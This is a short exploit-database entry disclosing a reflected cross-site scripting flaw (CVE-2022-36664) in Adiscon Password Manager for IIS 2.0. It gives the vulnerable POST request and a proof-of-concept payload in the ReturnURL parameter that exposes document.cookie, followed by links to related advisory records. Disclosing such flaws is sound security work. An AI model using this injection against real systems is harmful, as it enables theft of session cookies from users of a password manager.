Lucene search
VP4TR10T1337DAY-ID-38015HistoryOct 04, 2022 - 12:00 a.m.
Password Manager For IIS 2.0 Cross Site Scripting Vulneraility
2022-10-0400:00:00
VP4TR10T
0day.today
180
password manager
iis
cross site scripting
EPSS
0.001
Percentile
47.3%
# Exploit Title: *XSS*
# Exploit Author: *VP4TR10T*
# Vendor Homepage:*http://passwordmanager.adiscon.com/en/manual/
<http://passwordmanager.adiscon.com/en/manual/>
*# Software Link:*http://passwordmanager.adiscon.com/
<http://passwordmanager.adiscon.com/>
*# Version: *Version 2.0
*# Tested on: *WINDOWS*# CVE : *CVE-2022-36664
*Affected URI (when trying to change user password):
POST /isapi/PasswordManager.dll HTTP/1.1
HTTP Payload (Affected Parameter ):
ReturnURL=<script>alert(document.cookie)</script>
*Cordially,*
Related
exploitdb
exploitdb
Password Manager for IIS v2.0 - XSS
2023-03-25 00:00:00
cve
cve
CVE-2022-36664
2022-12-26 22:15:10
nvd
nvd
CVE-2022-36664
2022-12-26 22:15:10
prion
prion
Cross site scripting
2022-12-26 22:15:00
zdt
zdt
Password Manager for IIS v2.0 - XSS Vulnerability
2023-03-27 00:00:00
cvelist
cvelist
CVE-2022-36664
2022-12-26 00:00:00
packetstorm
packetstorm
Password Manager For IIS 2.0 Cross Site Scripting
2022-10-03 00:00:00